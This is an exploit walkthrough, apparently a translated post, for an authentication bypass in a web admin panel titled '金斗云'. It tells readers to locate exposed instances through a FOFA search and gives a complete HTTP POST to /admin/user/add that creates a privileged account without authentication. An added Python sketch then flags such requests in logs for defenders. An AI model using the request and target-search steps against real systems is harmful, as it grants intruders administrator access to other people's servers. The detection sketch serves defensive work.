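Search FOFA for title="金斗云"
Enter any account and password, and open Burp Suite to capture the request
Replace the captured login request with the one below. The QWER values must be taken from your own capture. You log in with userCode and password; the site displays userName. Sending the request repeatedly returns a "user exists" message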
POST /admin/user/add HTTP/1.1
Host: <site IP>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 287
Origin: http://<IP:port>
Connection: close
Referer: http://<IP:port>/
Priority: u=0

{"appId":"hkmp","mchId":"hkmp","deviceId":"hkmp","timestamp":QWER,"nonce":QWER,"sign":"hkmp","data":{"userCode":"<your choice>","userName":"<your choice>","password":"<your choice>","privilege":["1000","8000","8010","2000","2001","2010","7000"],"adminUserCode":"admin","adminUserName":"admin"}}
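The parts in red correspond to the QWER values, which are obtained from the captured login request
Try logging in with the userCode and password: success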
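For defenders, an added detection sketch (not part of the original post, and not the vendor's code): it flags logged requests to /admin/user/add that, like the request above, carry no Cookie or Authorization header or use a sign value identical to appId/mchId/deviceId. The log record layout, the function names and the sample records are assumptions constructed for this example.

```python
import json

# Constructed sample records (not real traffic). The record layout is an
# assumption about how a reverse proxy or WAF might log each request.
SAMPLE_REQUESTS = [
    {"src": "203.0.113.7", "method": "POST", "path": "/admin/user/add",
     "headers": {"Content-Type": "application/json;charset=UTF-8"},
     "body": '{"appId":"hkmp","mchId":"hkmp","deviceId":"hkmp","timestamp":1,"nonce":1,'
             '"sign":"hkmp","data":{"userCode":"u1","userName":"u1","password":"x",'
             '"privilege":["1000","8000"],"adminUserCode":"admin","adminUserName":"admin"}}'},
    {"src": "10.0.0.5", "method": "POST", "path": "/admin/user/add",
     "headers": {"Cookie": "session=constructed"},
     "body": '{"appId":"hkmp","sign":"9f2c4e1a7b3d","data":{"userCode":"u2","privilege":["2000"]}}'},
    {"src": "203.0.113.9", "method": "POST", "path": "/admin/user/add",
     "headers": {}, "body": "not json"},
]

def suspicious_user_add(req):
    """Return the reasons a logged request matches the pattern in the post."""
    path = req["path"].split("?")[0].rstrip("/")
    if req["method"] != "POST" or path != "/admin/user/add":
        return []
    reasons = []
    header_names = {name.lower() for name in req.get("headers", {})}
    if not header_names & {"cookie", "authorization"}:
        reasons.append("no session or auth header")
    try:
        body = json.loads(req["body"])
    except (ValueError, TypeError):
        return reasons + ["unparseable body"]
    if not isinstance(body, dict):
        return reasons + ["unexpected body shape"]
    sign = body.get("sign")
    if sign is not None and sign in (body.get("appId"), body.get("mchId"), body.get("deviceId")):
        reasons.append("sign is a static identifier, not a computed value")
    if not reasons:
        return []  # authenticated and properly signed: not this pattern
    data = body.get("data") if isinstance(body.get("data"), dict) else {}
    privs = data.get("privilege")
    if isinstance(privs, list) and privs:
        reasons.append("grants privileges: " + ",".join(map(str, privs)))
    return reasons

def scan(requests):
    """Return (source address, reasons) for every request worth an alert."""
    return [(r["src"], why) for r in requests if (why := suspicious_user_add(r))]

if __name__ == "__main__":
    for src, why in scan(SAMPLE_REQUESTS):
        print(src, "->", "; ".join(why))
```

Accounts created by flagged requests should be reviewed against the user list, since the post shows the new account can log in immediately.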